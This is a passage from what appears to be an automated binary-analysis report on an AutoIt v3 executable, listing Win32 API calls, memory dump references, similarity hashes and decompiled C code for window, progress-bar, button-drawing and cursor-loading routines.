                • CreateWindowExW.USER32 ref: 004496D5
                • GetClientRect.USER32 ref: 004496E5
                • CreateWindowExW.USER32 ref: 00449728
                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0044974D
                • GetFileSize.KERNEL32(00000000,00000000), ref: 00449768
                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00449773
                • GlobalLock.KERNEL32 ref: 0044977C
                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0044978B
                • GlobalUnlock.KERNEL32(00000000), ref: 00449792
                • CloseHandle.KERNEL32(00000000), ref: 00449799
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004497A6
                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004729F8,00000000), ref: 004497BD
                • GlobalFree.KERNEL32 ref: 004497CF
                • CopyImage.USER32 ref: 004497FB
                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 0044981E
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00449844
                • ShowWindow.USER32(?,00000004), ref: 00449852
                • CreateWindowExW.USER32 ref: 0044989C
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004498B0
                • GetStockObject.GDI32(00000011), ref: 004498BA
                • SelectObject.GDI32(00000000,00000000), ref: 004498C2
                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004498D2
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004498DB
                • DeleteDC.GDI32(00000000), ref: 004498E5
                • _wcslen.LIBCMT ref: 00449903
                • _wcscpy.LIBCMT ref: 00449927
                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004499C8
                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004499DC
                • GetDC.USER32(00000000), ref: 004499E9
                • SelectObject.GDI32(00000000,?), ref: 004499F9
                • SelectObject.GDI32(00000000,00000007), ref: 00449A24
                • ReleaseDC.USER32 ref: 00449A2F
                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00449A4C
                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00449A5A
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp
                Similarity
                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                • String ID: $AutoIt v3$DISPLAY$static
                • API String ID: 4040870279-2373415609
                • Opcode ID: ae0fbc15bf17b9d564498d965657e75ae0bfff4bf015b2b40d90b7b92fda4431
                • Instruction ID: d4a0465d4fa381bba3859d467117e45e845050e229b6802b0ad416717c68e306
                • Opcode Fuzzy Hash: ae0fbc15bf17b9d564498d965657e75ae0bfff4bf015b2b40d90b7b92fda4431
                • Instruction Fuzzy Hash: 20028371A00205AFEB14DF64CD89FAE77B9FB48700F108559FA09AB291C7B4ED41CB68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E00431746(intOrPtr _a4, struct HWND__** _a8) {
                				signed int _v32;
                				long _v36;
                				struct tagRECT _v52;
                				struct tagRECT _v68;
                				void* _v72;
                				WCHAR* _v76;
                				struct HBRUSH__* _v80;
                				long _v84;
                				int _v88;
                				long _v92;
                				int _v96;
                				void* _v100;
                				void* __edi;
                				void* __esi;
                				signed int _t104;
                				long _t106;
                				long _t108;
                				long _t111;
                				void* _t113;
                				WCHAR* _t127;
                				struct HBRUSH__* _t160;
                				signed int _t168;
                				struct HWND__** _t169;
                				int _t170;
                				WCHAR* _t171;
                				signed int _t191;
                				struct HDC__* _t213;
                				intOrPtr _t217;
                				void* _t219;
                
                				_t217 = _a4;
                				if( *0x48751c == 0) {
                					_t104 =  *(_t217 + 0x10);
                					_t213 =  *(_t217 + 0x18);
                					_t168 = _t104 & 0x00000006;
                					_v52.right = _t104 & 0x00000010;
                					_v32 = _t168;
                					_v52.top.left = _t104 & 0x00000001;
                					__eflags = _t168;
                					if(_t168 == 0) {
                						_t106 = _a8[0x12];
                						__eflags = _t106 - 0xffffffff;
                						if(_t106 == 0xffffffff) {
                							_push(0x12);
                							goto L6;
                						}
                					} else {
                						_push(0xe);
                						L6:
                						_t106 = GetSysColor();
                					}
                					_v52.top.left = SetTextColor(_t213, _t106);
                					_t108 = _a8[0x11];
                					__eflags = _t108 - 0xffffffff;
                					if(_t108 != 0xffffffff) {
                						_v68.top.left = CreateSolidBrush(_t108);
                						_t111 = _a8[0x11];
                					} else {
                						_v68.right.left = GetSysColorBrush(0xf);
                						_t111 = GetSysColor(0xf);
                					}
                					_v52.right = SetBkColor(_t213, _t111);
                					_t113 = SelectObject(_t213, _v72);
                					__eflags = _v76;
                					_v68.bottom = _t113;
                					_v52.top.left =  *(_t217 + 0x1c);
                					_v52.right =  *(_t217 + 0x20);
                					_v52.bottom =  *(_t217 + 0x24);
                					_v36 =  *(_t217 + 0x28);
                					if(_v76 == 0) {
                						__eflags = _v72;
                						if(_v72 != 0) {
                							InflateRect( &(_v52.top), 0xffffffff, 0xffffffff);
                						}
                						DrawFrameControl(_t213,  &(_v52.top), 4, 0x10);
                					} else {
                						InflateRect( &(_v52.top), 0xffffffff, 0xffffffff);
                						_t160 = CreateSolidBrush(GetSysColor(0x10));
                						_v68.left = _t160;
                						FrameRect(_t213,  &_v52, _t160);
                						DeleteObject(_v68.left);
                					}
                					__eflags = _v76;
                					_v52.top.left =  *(_t217 + 0x1c);
                					_v52.right =  *(_t217 + 0x20);
                					_v52.bottom =  *(_t217 + 0x24);
                					_v36 =  *(_t217 + 0x28);
                					if(_v76 == 0) {
                						__eflags = _v72;
                						if(_v72 == 0) {
                							_push(0xfffffffe);
                							_push(0xfffffffe);
                							_push( &(_v52.top));
                						} else {
                							_push(0xfffffffd);
                							_push(0xfffffffd);
                							_push( &(_v52.top));
                						}
                						InflateRect();
                						_v52.top.left = _v52.top.left - 1;
                						_t51 =  &(_v52.right);
                						 *_t51 = _v52.right - 1;
                						__eflags =  *_t51;
                					} else {
                						InflateRect( &(_v52.top), 0xfffffffe, 0xfffffffe);
                					}
                					FillRect(_t213,  &(_v52.top), _v80);
                					__eflags = _v88;
                					if(_v88 != 0) {
                						L23:
                						_v68.right.left = _v68.right.left + 2;
                						_t58 =  &(_v68.bottom);
                						 *_t58 = _v68.bottom + 2;
                						__eflags =  *_t58;
                					} else {
                						__eflags = _t168;
                						if(_t168 != 0) {
                							goto L23;
                						}
                					}
                					_t169 = _a8;
                					_v88 = 0x105;
                					__eflags = GetWindowLongW( *_t169, 0xfffffff0) & 0x00002000;
                					if(__eflags == 0) {
                						_v88 = 0x125;
                					}
                					_t65 = SendMessageW( *_t169, 0xe, 0, 0) + 1; // 0x1
                					_t170 = _t65;
                					_push( ~(0 | __eflags > 0x00000000) | _t170 * 0x00000002);
                					_t127 = E004014F7(_t213, _t217, __eflags);
                					_v76 = _t127;
                					GetWindowTextW( *_a8, _t127, _t170);
                					_t171 = _v76;
                					DrawTextW(_t213, _t171, 0xffffffff,  &(_v68.right), _v88);
                					__eflags = _v72;
                					if(_v72 != 0) {
                						_v52.left =  *(_t217 + 0x24);
                						_t191 =  *(_t217 + 0x20) + 1;
                						__eflags = _t191;
                						_v52.top.left =  *(_t217 + 0x28);
                						_v68.right.left =  *(_t217 + 0x1c) + 1;
                						_v68.bottom = _t191;
                						SetTextColor(_t213, GetSysColor(0x11));
                						DrawTextW(_t213, _t171, 0xffffffff,  &_v68, _v96);
                					}
                					__eflags = _v84;
                					if(_v84 != 0) {
                						_v68.right.left =  *(_t217 + 0x1c);
                						_v68.bottom =  *(_t217 + 0x20);
                						_v52.left =  *(_t217 + 0x24);
                						_v52.top.left =  *(_t217 + 0x28);
                						_t219 = CreateSolidBrush(0);
                						FrameRect(_t213,  &(_v68.top), _t219);
                						DeleteObject(_t219);
                						InflateRect( &_v68, 0xfffffffc, 0xfffffffc);
                						DrawFocusRect(_t213,  &_v68);
                					}
                					_push(_t171);
                					E004010FC();
                					SelectObject(_t213, _v68);
                					DeleteObject(_v100);
                					SetTextColor(_t213, _v92);
                					SetBkColor(_t213, _v84);
                					return 1;
                				} else {
                					return E0042085C(_t217, _a8);
                				}
                			}

                APIs
                • GetSysColor.USER32(00000012), ref: 004317A5
                • SetTextColor.GDI32(?,?), ref: 004317AD
                • GetSysColorBrush.USER32(0000000F), ref: 004317C4
                • GetSysColor.USER32(0000000F), ref: 004317D0
                • SetBkColor.GDI32(?,?), ref: 004317EB
                • SelectObject.GDI32(?,?), ref: 004317FB
                • InflateRect.USER32(?,000000FF,000000FF), ref: 00431831
                • GetSysColor.USER32(00000010), ref: 00431839
                • CreateSolidBrush.GDI32(00000000), ref: 00431840
                • FrameRect.USER32 ref: 00431851
                • DeleteObject.GDI32(?), ref: 0043185C
                • InflateRect.USER32(?,000000FE,000000FE), ref: 004318B6
                • FillRect.USER32 ref: 004318F7
                  • Part of subcall function 0042085C: GetSysColor.USER32(0000000E), ref: 00420880
                  • Part of subcall function 0042085C: SetTextColor.GDI32(?,00000000), ref: 00420888
                  • Part of subcall function 0042085C: GetSysColorBrush.USER32(0000000F), ref: 004208BB
                  • Part of subcall function 0042085C: GetSysColor.USER32(0000000F), ref: 004208C6
                  • Part of subcall function 0042085C: GetSysColor.USER32(00000011), ref: 004208E6
                  • Part of subcall function 0042085C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004208F8
                  • Part of subcall function 0042085C: SelectObject.GDI32(?,00000000), ref: 00420909
                  • Part of subcall function 0042085C: SetBkColor.GDI32(?,?), ref: 00420913
                  • Part of subcall function 0042085C: SelectObject.GDI32(?,?), ref: 00420921
                  • Part of subcall function 0042085C: InflateRect.USER32(?,000000FF,000000FF), ref: 00420946
                  • Part of subcall function 0042085C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00420961
                  • Part of subcall function 0042085C: GetWindowLongW.USER32(?,000000F0), ref: 00420976
                  • Part of subcall function 0042085C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00420996
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp
                Similarity
                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                • String ID:
                • API String ID: 69173610-0
                • Opcode ID: 9c6fd34123d903e9244659616457945ecc0f4c4541dc0edc53f292c162637772
                • Instruction ID: 0596952ca2a31e29a288620f92e8218bf9a71f11a91a738376b034a6c3915bbd
                • Opcode Fuzzy Hash: 9c6fd34123d903e9244659616457945ecc0f4c4541dc0edc53f292c162637772
                • Instruction Fuzzy Hash: EDB15C71508300AFD314DF64DD88E6BB7F8FB88720F505A2EF59A822A0D774E885CB56
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E004490AA(signed int __eax, void* __eflags, int _a4, intOrPtr _a8, intOrPtr _a12) {
                				int _v8;
                				struct tagRECT _v24;
                				long _v28;
                				WCHAR* _v44;
                				short _v176;
                				void* __esi;
                				signed int _t67;
                				struct HWND__* _t69;
                				struct HWND__* _t77;
                				struct HWND__* _t102;
                				signed int _t115;
                				signed int _t119;
                				signed char _t122;
                				signed char _t123;
                				signed char _t124;
                				int _t134;
                				signed int _t136;
                				signed int _t137;
                				intOrPtr _t160;
                				long _t177;
                				intOrPtr _t182;
                				long _t183;
                				struct HDC__* _t184;
                
                				_t134 = _a4;
                				_t67 = __eax | 0xffffffff;
                				_t136 =  &_v44;
                				_v8 = _t67;
                				_a4 = _t67;
                				_t177 = 0x88c00000;
                				_v28 = 8;
                				E003FBEC0(_t136, __eflags);
                				_t69 =  *0x487510;
                				if(_t69 != 0) {
                					DestroyWindow(_t69);
                					 *0x487510 = 0;
                				}
                				if(_a12 != 1) {
                					_t182 = _a8;
                					__eflags = _t182 - 3;
                					if(_t182 >= 3) {
                						E003FDE00( &_v44, E00443360( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + 8))));
                						_t182 = _a8;
                					}
                					__eflags = _t182 - 4;
                					if(_t182 >= 4) {
                						_t136 =  *( *((intOrPtr*)(_t134 + 4)) + 0xc);
                						_v8 = E003FC8A0(_t136);
                					}
                					__eflags = _t182 - 5;
                					if(_t182 >= 5) {
                						_t160 =  *((intOrPtr*)(_t134 + 4));
                						_t136 =  *(_t160 + 0x10);
                						_a4 = E003FC8A0(_t136);
                					}
                					__eflags = _t182 - 6;
                					if(_t182 >= 6) {
                						_t122 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + 0x14)));
                						__eflags = _t122 & 0x00000001;
                						if((_t122 & 0x00000001) != 0) {
                							_t177 = 0x88000000;
                						}
                						_t123 = E003FC8A0( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + 0x14)));
                						__eflags = _t123 & 0x00000002;
                						if((_t123 & 0x00000002) != 0) {
                							_v28 = 0;
                						}
                						_t160 =  *((intOrPtr*)(_t134 + 4));
                						_t136 =  *(_t160 + 0x14);
                						_t124 = E003FC8A0(_t136);
                						__eflags = _t124 & 0x00000010;
                						if((_t124 & 0x00000010) != 0) {
                							_t177 = _t177 ^ 0x08000000;
                							__eflags = _t177;
                						}
                					}
                					SystemParametersInfoW(0x30, 0,  &_v24, 0);
                					_t137 = _t136 | 0xffffffff;
                					__eflags = _v8 - _t137;
                					if(_v8 == _t137) {
                						asm("cdq");
                						_t119 = _v24.right + 0xfffffed4 - _t160;
                						__eflags = _t119;
                						_v8 = _t119 >> 1;
                					}
                					__eflags = _a4 - _t137;
                					if(_a4 == _t137) {
                						asm("cdq");
                						_t115 = _v24.bottom + 0xffffff9c - _t160;
                						__eflags = _t115;
                						_a4 = _t115 >> 1;
                					}
                					SetRect( &_v24, 0, 0, 0x12c, 0x64);
                					_t183 = _v28;
                					AdjustWindowRectEx( &_v24, _t177, 0, _t183);
                					_t77 = CreateWindowExW(_t183, L"AutoIt v3", E00443381( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4))))), _t177, _v8, _a4, _v24.right - _v24.left, _v24.bottom - _v24.top,  *0x487518, 0, 0, 0);
                					 *0x487510 = _t77;
                					GetClientRect(_t77,  &_v24);
                					 *0x487508 = CreateWindowExW(0, L"static", E00443381( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + 4))), 0x50000000, _v24.right - _v24.left - 0x119, 4, 0x500, 0x18,  *0x487510, 0, 0, 0);
                					_t184 = CreateDCW(L"DISPLAY", 0, 0, 0);
                					SelectObject(_t184, GetStockObject(0x11));
                					GetTextFaceW(_t184, 0x40,  &_v176);
                					_t135 = GetDeviceCaps(_t184, 0x5a);
                					DeleteDC(_t184);
                					SendMessageW( *0x487508, 0x30, CreateFontW((0x38e38e39 * ( ~_t88 +  ~_t88 +  ~_t88 +  ~_t88 - _t135 +  ~_t88 +  ~_t88 +  ~_t88 +  ~_t88 - _t135) >> 0x20 >> 4 >> 0x1f) + (0x38e38e39 * ( ~_t88 +  ~_t88 +  ~_t88 +  ~_t88 - _t135 +  ~_t88 +  ~_t88 +  ~_t88 +  ~_t88 - _t135) >> 0x20 >> 4), 0, 0, 0, 0x258, 0, 0, 0, 1, 4, 0, 2, 0,  &_v176), 1);
                					asm("cdq");
                					_t102 = CreateWindowExW(0x200, L"msctls_progress32", 0, 0x50000001, _v24.right - _v24.left - 0x104 -  *0x487510 >> 1, 0x1e, 0x104, 0x14,  *0x487510, 0, 0, 0);
                					 *0x48750c = _t102;
                					SendMessageW(_t102, 0x401, 0, 0x640000);
                					SendMessageW( *0x48750c, 0x404, 1, 0);
                					 *0x487504 = CreateWindowExW(0, L"static", _v44, 0x50000000, _v24.right - _v24.left - 0x118, 0x37, 0x500, 0x32,  *0x487510, 0, 0, 0);
                					SendMessageW( *0x487504, 0x30, GetStockObject(0x11), 1);
                					ShowWindow( *0x487510, 4);
                					E003F2480( &_v44);
                					__eflags = 0;
                					return 0;
                				} else {
                					E003F2480( &_v44);
                					return 0;
                				}
                			}


                APIs
                • DestroyWindow.USER32(?), ref: 004490DF
                • SystemParametersInfoW.USER32 ref: 0044919C
                • SetRect.USER32 ref: 004491DC
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 004491ED
                • CreateWindowExW.USER32 ref: 0044922F
                • GetClientRect.USER32 ref: 0044923B
                • CreateWindowExW.USER32 ref: 0044927D
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0044928F
                • GetStockObject.GDI32(00000011), ref: 00449299
                • SelectObject.GDI32(00000000,00000000), ref: 004492A1
                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004492B1
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004492BA
                • DeleteDC.GDI32(00000000), ref: 004492C3
                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00449309
                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00449321
                • CreateWindowExW.USER32 ref: 0044935B
                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0044936F
                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00449380
                • CreateWindowExW.USER32 ref: 004493B5
                • GetStockObject.GDI32(00000011), ref: 004493C0
                • SendMessageW.USER32(?,00000030,00000000), ref: 004493D0
                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004493DB
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp
                Similarity
                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                • API String ID: 2910397461-517079104
                • Opcode ID: e5c18ba1b66e09dfdb581a96d18cee9585bc4aa04f0765c20c6c7636c647ade3
                • Instruction ID: 3d83fb1d13ead66254dd67ed12a9df1318b787f6da045e6d57d5e8c0da1f7e64
                • Opcode Fuzzy Hash: e5c18ba1b66e09dfdb581a96d18cee9585bc4aa04f0765c20c6c7636c647ade3
                • Instruction Fuzzy Hash: 12A17171A40205BFFB14DF64DD9AFAE7769EB44701F208519FB05AB2D0D6B0AD40CB68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004206A4(signed int _a4) {
                				signed int _t4;
                
                				_t4 = _a4;
                				if(_t4 > 0x10) {
                					L16:
                					return SetCursor(LoadCursorW(0, 0x7f00));
                				} else {
                					switch( *((intOrPtr*)(_t4 * 4 +  &M00420818))) {
                						case 0:
                							return SetCursor(LoadCursorW(0, 0x7f89));
                							goto L17;
                						case 1:
                							__eax = LoadCursorW(0, 0x7f8a);
                							return __eax;
                							goto L17;
                						case 2:
                							goto L16;
                						case 3:
                							__eax = LoadCursorW(0, 0x7f03);
                							return __eax;
                							goto L17;
                						case 4:
                							__eax = LoadCursorW(0, 0x7f8b);
                							return __eax;
                							goto L17;
                						case 5:
                							__eax = LoadCursorW(0, 0x7f01);
                							return __eax;
                							goto L17;
                						case 6:
                							__eax = LoadCursorW(0, 0x7f88);
                							return __eax;
                							goto L17;
                						case 7:
                							__eax = LoadCursorW(0, 0x7f86);
                							return __eax;
                							goto L17;
                						case 8:
                							__eax = LoadCursorW(0, 0x7f83);
                							return __eax;
                							goto L17;
                						case 9:
                							__eax = LoadCursorW(0, 0x7f85);
                							return __eax;
                							goto L17;
                						case 0xa:
                							__eax = LoadCursorW(0, 0x7f82);
                							return __eax;
                							goto L17;
                						case 0xb:
                							__eax = LoadCursorW(0, 0x7f84);
                							return __eax;
                							goto L17;
                						case 0xc:
                							__eax = LoadCursorW(0, 0x7f04);
                							return __eax;
                							goto L17;
                						case 0xd:
                							__eax = LoadCursorW(0, 0x7f02);
                							return __eax;
                							goto L17;
                						case 0xe:
                							return SetCursor(0);
                							goto L17;
                					}
                				}
                				L17:
                			}





                APIs
                • LoadCursorW.USER32(00000000,00007F89), ref: 004206C1
                • SetCursor.USER32(00000000), ref: 004206C8
                • LoadCursorW.USER32(00000000,00007F8A), ref: 004206D9
                • SetCursor.USER32(00000000), ref: 004206E0
                • LoadCursorW.USER32(00000000,00007F03), ref: 004206F1
                • SetCursor.USER32(00000000), ref: 004206F8
                • LoadCursorW.USER32(00000000,00007F8B), ref: 00420709
                • SetCursor.USER32(00000000), ref: 00420710
                • LoadCursorW.USER32(00000000,00007F01), ref: 00420721
                • SetCursor.USER32(00000000), ref: 00420728
                • LoadCursorW.USER32(00000000,00007F88), ref: 00420739
                • SetCursor.USER32(00000000), ref: 00420740
                • LoadCursorW.USER32(00000000,00007F86), ref: 00420751
                • SetCursor.USER32(00000000), ref: 00420758
                • LoadCursorW.USER32(00000000,00007F83), ref: 00420769
                • SetCursor.USER32(00000000), ref: 00420770
                • LoadCursorW.USER32(00000000,00007F85), ref: 00420781
                • SetCursor.USER32(00000000), ref: 00420788
                • LoadCursorW.USER32(00000000,00007F82), ref: 00420799
                • SetCursor.USER32(00000000), ref: 004207A0
                • LoadCursorW.USER32(00000000,00007F84), ref: 004207B1
                • SetCursor.USER32(00000000), ref: 004207B8
                • LoadCursorW.USER32(00000000,00007F04), ref: 004207C9
                • SetCursor.USER32(00000000), ref: 004207D0
                • LoadCursorW.USER32(00000000,00007F02), ref: 004207E1
                • SetCursor.USER32(00000000), ref: 004207E8
                • SetCursor.USER32(00000000), ref: 004207F4
                • LoadCursorW.USER32(00000000,00007F00), ref: 00420805
                • SetCursor.USER32(00000000), ref: 0042080C
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Cursor$Load
                • String ID:
                • API String ID: 1675784387-0
                • Opcode ID: 4e9b87dee43c06cbb3df9c1248ac0cbd69f9d630d7977fef8bee4bbdabd24e7c
                • Instruction ID: 1025aa16d1a2dc63b225bd7aad9e021c4b64ebb8176314db28861e78240d500e
                • Opcode Fuzzy Hash: 4e9b87dee43c06cbb3df9c1248ac0cbd69f9d630d7977fef8bee4bbdabd24e7c
                • Instruction Fuzzy Hash: 72312472988205F7E6545BE0BE0DF597718FB64727F004432F30DA54D0CBF551A19A6E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E0042085C(struct HBRUSH__* _a4, struct HWND__** _a8) {
                				long _v8;
                				long _v12;
                				signed int _v16;
                				int _v20;
                				signed int _v24;
                				WCHAR* _v28;
                				void* _v32;
                				void* _v36;
                				void* _v40;
                				long _v44;
                				struct tagRECT _v60;
                				void* __edi;
                				void* __esi;
                				signed int _t72;
                				signed int _t73;
                				long _t74;
                				long _t75;
                				long _t76;
                				long _t78;
                				long _t79;
                				void* _t80;
                				signed int _t93;
                				WCHAR* _t95;
                				struct HWND__** _t117;
                				struct HBRUSH__* _t149;
                				WCHAR* _t150;
                				struct HDC__* _t152;
                				signed int _t159;
                
                				_t149 = _a4;
                				_t72 =  *(_t149 + 0x10);
                				_t152 =  *(_t149 + 0x18);
                				_t73 = _t72 & 0x00000006;
                				_v24 = _t72 & 0x00000010;
                				_v16 = _t73;
                				if(_t73 == 0) {
                					_t117 = _a8;
                					_t74 =  *(_t117 + 0x48);
                					__eflags = _t74 - 0xffffffff;
                					if(__eflags == 0) {
                						_t74 = GetSysColor(0x12);
                					}
                					_t75 = SetTextColor(_t152, _t74);
                				} else {
                					_t75 = SetTextColor(_t152, GetSysColor(0xe));
                					_t117 = _a8;
                				}
                				_v8 = _t75;
                				_t76 =  *(_t117 + 0x44);
                				if(_t76 != 0xffffffff) {
                					_a4 = CreateSolidBrush(_t76);
                					_t78 =  *(_t117 + 0x44);
                				} else {
                					_a4 = GetSysColorBrush(0xf);
                					_t78 = GetSysColor(0xf);
                				}
                				_v12 = _t78;
                				if(_v16 == 0) {
                					_t79 = 0x743c00;
                				} else {
                					_t79 = GetSysColor(0x11);
                				}
                				_t80 = CreatePen(0, 1, _t79);
                				_v40 = _t80;
                				_v36 = SelectObject(_t152, _t80);
                				_v44 = SetBkColor(_t152, _v12);
                				_v32 = SelectObject(_t152, _a4);
                				_v60.top =  *(_t149 + 0x20);
                				_v60.left =  *(_t149 + 0x1c);
                				_v60.right =  *(_t149 + 0x24);
                				_v60.bottom =  *(_t149 + 0x28);
                				InflateRect( &_v60, 0xffffffff, 0xffffffff);
                				RoundRect(_t152, _v60.left, _v60.top, _v60.right, _v60.bottom, 5, 5);
                				_v12 = 0x105;
                				_t159 = GetWindowLongW( *_a8, 0xfffffff0) & 0x00002000;
                				if(_t159 == 0) {
                					_v12 = 0x125;
                				}
                				_t93 = SendMessageW( *_a8, 0xe, 0, 0) + 1;
                				_v20 = _t93;
                				_push( ~(0 | _t159 > 0x00000000) | _t93 * 0x00000002);
                				_t95 = E004014F7(_t149, _t152, _t159);
                				_v28 = _t95;
                				GetWindowTextW( *_a8, _t95, _v20);
                				if(_v24 != 0) {
                					_v60.top =  *(_t149 + 0x20);
                					_v60 =  *(_t149 + 0x1c);
                					_v60.right =  *(_t149 + 0x24);
                					_v60.bottom =  *(_t149 + 0x28);
                					InflateRect( &_v60, 0xfffffffd, 0xfffffffd);
                					DrawFocusRect(_t152,  &_v60);
                				}
                				if(_v16 != 0) {
                					SetTextColor(_t152, GetSysColor(0x11));
                				}
                				_t150 = _v28;
                				DrawTextW(_t152, _t150, 0xffffffff,  &_v60, _v12);
                				_push(_t150);
                				E004010FC();
                				SelectObject(_t152, _v32);
                				DeleteObject(_a4);
                				SelectObject(_t152, _v36);
                				DeleteObject(_v40);
                				SetTextColor(_t152, _v8);
                				SetBkColor(_t152, _v44);
                				return 1;
                			}


                APIs
                • GetSysColor.USER32(0000000E), ref: 00420880
                • SetTextColor.GDI32(?,00000000), ref: 00420888
                • GetSysColor.USER32(00000012), ref: 004208A0
                • SetTextColor.GDI32(?,?), ref: 004208A8
                • GetSysColorBrush.USER32(0000000F), ref: 004208BB
                • GetSysColor.USER32(0000000F), ref: 004208C6
                • CreateSolidBrush.GDI32(?), ref: 004208CF
                • GetSysColor.USER32(00000011), ref: 004208E6
                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 004208F8
                • SelectObject.GDI32(?,00000000), ref: 00420909
                • SetBkColor.GDI32(?,?), ref: 00420913
                • SelectObject.GDI32(?,?), ref: 00420921
                • InflateRect.USER32(?,000000FF,000000FF), ref: 00420946
                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00420961
                • GetWindowLongW.USER32(?,000000F0), ref: 00420976
                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00420996
                • GetWindowTextW.USER32 ref: 004209C7
                • InflateRect.USER32(?,000000FD,000000FD), ref: 004209F3
                • DrawFocusRect.USER32 ref: 004209FE
                • GetSysColor.USER32(00000011), ref: 00420A0C
                • SetTextColor.GDI32(?,00000000), ref: 00420A14
                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00420A29
                • SelectObject.GDI32(?,?), ref: 00420A3D
                • DeleteObject.GDI32(00000105), ref: 00420A49
                • SelectObject.GDI32(?,?), ref: 00420A50
                • DeleteObject.GDI32(?), ref: 00420A56
                • SetTextColor.GDI32(?,?), ref: 00420A5D
                • SetBkColor.GDI32(?,?), ref: 00420A68
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                • String ID:
                • API String ID: 1582027408-0
